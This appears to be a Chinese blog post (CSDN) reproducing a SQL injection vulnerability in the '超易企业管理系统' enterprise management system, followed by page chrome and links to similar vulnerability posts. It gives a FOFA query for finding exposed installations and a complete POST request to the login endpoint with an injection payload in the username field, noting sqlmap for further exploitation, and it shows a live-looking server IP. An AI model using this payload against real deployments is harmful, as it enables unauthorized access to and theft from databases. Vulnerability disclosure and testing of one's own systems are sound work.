超易企业管理系统存在SQL注入漏洞

于 2024-08-21 19:16:03 发布
阅读量26 收藏
点赞数 1
分类专栏: 漏洞复现 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45790890/article/details/141401088
版权
1 前言

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!

fofa语句

"超易企业管理系统"

 

根据提示测试

 

但是根据回显出现sql语句,该方式为post方式

POST /ajax/Login.ashx?Date=%271724238286730%27 HTTP/1.1
Host: 
Content-Length: 289
Accept: text/plain, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://39.107.35.208:8092
Referer: http://39.107.35.208:8092/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: keep-alive

username=jsh' AND 4026 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(107)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (4026=4026) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(112)+CHAR(113))) AND 'XijY'='XijY&password=1&loginguid=b84898ec-9884-4b54-8b44-a90bf0db0183&logintype=pc

 

sqlmap

 

 

外道・輪廻天生
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
润申信息企业标准化管理系统 多处SQL注入漏洞复现
0xSec
11-30 936
润申信息科技企业标准化管理系统 CommentStandardHandler.ashx、DefaultHandler.ashx接口处存在SQL注入漏洞。攻击者可利用漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
某赛通电子文档安全管理系统 多处 SQL注入漏洞复现
0xSec
04-26 1888
某赛通电子文档安全管理系统存在多处SQL注入漏洞,未经身份验证的远程攻击者可利用此漏洞获取数据库敏感信息,进一步利用可获取服务器权限。
1day 医药信息管理系统GetLshByTj存在SQL注入漏洞
weixin_43167326的博客
06-21 925
医药信息管理系统是一个全面且高效的管理工具,涵盖了销售管理、客户档案管理、药品字典管理等多个核心模块。医药信息管理系统GetLshByTj存在SQL注入漏洞
1day中小学智慧校园信息管理系统存在SQL注入漏洞
weixin_43167326的博客
04-26 1011
智慧校园信息系统”主要针对中小学市场研发,是全国首家采用B/S架构,基于云计算和物联网技术,通过浏览器直接登录就可以使用的新型应用管理系统。该系统集“名校云”、“名师云”、“资源云”为一体,全国各地的中小学都可以共同使用。
SeaCMS海洋影视管理系统dmku存在SQL注入漏洞
weixin_43167326的博客
05-20 1085
海洋影视管理系统(seacms,海洋cms)海洋cms是基于PHP+MySql技术开发的开源CMS,是一套专为不同需求的站长而设计的视频点播系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选。SeaCMS是基于GPL协议100%开源免费,自适应电脑、手机、平板、APP多终端入口,无加密、安全有保障!SeaCMS dmku存在SQL 注入漏洞,黑客可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。
1day 计算机系统开发有限公司学分制系统存在SQL注入漏洞
weixin_43167326的博客
06-19 1098
计算机系统开发有限公司,成立于1996年,位于上海市,是一家以从事软件和信息技术服务业为主的企业。某计算机系统开发有限公司学分制系统存在SQL注入漏洞。致力于为中国制造业企业提供企业信息化及协同管理、数字化设计、数据安全等支撑软件和工程咨询服务。
sql注入详解
热门推荐
good good study
05-05 20万+
SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
0day 用友YonBIP getStaffInfo存在SQL注入漏洞
weixin_43167326的博客
06-12 1394
YonBIP用友商业创新平台,是用友在数字经济时代面向成长型、大型企业及巨型企业,融合了先进且高可用技术平台和公共与关键商业应用与服务,支撑和运行客户的商业创新(业务创新、管理变革),并且具有数字化、智能化、高弹性、安全可信、社会化、全球化、平台化、生态化等特征的综合型服务平台。用友YonBIP高级版存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。
CVE-2023-49371 RuoYi 若依后台管理系统存在SQL注入漏洞
qq_27536045的博客
12-14 2173
CVE-2023-49371|RuoYi 若依后台管理系统存在SQL注入漏洞漏洞复现)
url存在链接注入漏洞_检测到目标URL存在SQL注入漏洞
weixin_29458415的博客
01-13 2480
解决办法防护建议包括部署分层安全措施(包括在接受用户输入时使用参数化的查询)、确保应用程序仅使用预期的数据、加固数据库服务器防止不恰当的访问数据。建议使用以下措施防范SQL注入漏洞:对于开发========使用以下建议编写不受SQL注入***影响的web应用。参数化查询:SQL注入源于***者控制查询数据以修改查询逻辑,因此防范SQL注入***的最佳方式就是将查询的逻辑与其数据分隔,这可以防止执行...
eml企业通讯录管理系统 v5.4.4 SQL注入1
08-03
Eml企业通讯录管理系统v5.4.4的个人信息更新功能存在SQL注入漏洞。系统在更新用户信息时,使用了`_RunMagicQuotes`函数对$name`、$sex`、$tel`等参数进行了过滤,这在一定程度上提高了安全性。然而,关键的`id`参数...
SQL注入漏洞全接触.ppt
11-15
* 根据不同的数据库管理系统SQL注入漏洞可以分为Access注入、SQL Server注入、MySQL注入等。 * 不同的数据库管理系统有不同的函数、注入方法,所以在注入之前,我们还要判断一下数据库的类型。 四、 SQL注入漏洞...
禅道研发项⽬管理系统sql注入漏洞.zip
01-21
管理系统是一种通过计算机技术实现的用于组织、监控和控制各种活动的软件系统。这些系统通常被设计用来提高效率、减少错误、加强安全性,同时提供数据和信息支持。以下是一些常见类型的管理系统: 学校管理系统: ...
南方数据企业网站管理系统源码包-存有sql注入漏洞数据库备份getshell漏洞.zip
01-05
南方数据企业网站管理系统-存有sql注入漏洞数据库备份getshell漏洞,如有侵权,请联系CSDN管理员删除即可
正方教务系统新版sql注入漏洞利用工具
01-19
本人研究了/service.asmx中的其它接口,发现zfcwjk1存在同样的注入漏洞,特将注入方法写成工具供大家学习参考。 zfcwjk1似乎是一个财务类的确认接口,利用起来稍微麻烦点,需要一个目标学校的任意学号。 程序执行后...
SQL 时间盲注 (injection 第十六关)
最新发布
baishiqi12的博客
08-20 288
SQL 注入,仅供参考
SQL FOREIGN KEY 约束
m0_50736744的博客
08-16 441
SQL FOREIGN KEY 约束一个表中的 FOREIGN KEY 指向另一个表中的 UNIQUE KEY(唯一约束的键)。
SQL - 基础大汇总
心如冰清,天塌不惊
08-16 492
【代码】数据库 - 基础。
SQL - 多表查询
心如冰清,天塌不惊
08-18 437
【代码】SQL - 多表查询。
时空智友企业信息管理系统 sql注入漏洞
09-20
时空智友企业信息管理系统是一种企业级的信息管理系统,它用于帮助企业管理各种业务数据和信息。然而,该系统存在SQL注入漏洞,这可能导致安全风险和数据泄露。 SQL注入是一种针对Web应用程序的常见安全威胁。它发生在应用程序未能正确过滤用户输入的情况下。攻击者可以通过构建恶意的SQL查询,利用这个漏洞来执行未授权的数据库操作,甚至是获取未经授权的敏感数据。 针对时空智友企业信息管理系统SQL注入漏洞,我们需要采取以下措施来修复和防止此安全风险的发生: 1. 安全评估和漏洞扫描:对系统进行全面的安全评估,包括检查SQL注入漏洞。使用漏洞扫描工具定期扫描系统以及及时修复和更新漏洞。 2. 输入验证与过滤:所有用户输入数据都必须进行验证和过滤,以防止恶意用户输入带有特殊字符的SQL查询。可以使用参数化查询或预编译语句来减少SQL注入的风险。 3. 最小化权限:将数据库的权限设置为最小化,限制访问数据库的用户只能执行必要的操作,减少攻击者利用注入漏洞的可能性。 4. 错误和异常处理:在系统中实施安全的错误和异常处理机制,不向用户显示详细的错误信息,以防止攻击者了解系统结构和敏感信息。 5. 定期更新和维护:及时安装和应用官方发布的系统和数据库的补丁和更新,以修复已知的漏洞。 通过以上措施,时空智友企业信息管理系统SQL注入漏洞可以被修复和预防,保护系统和企业的数据安全。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值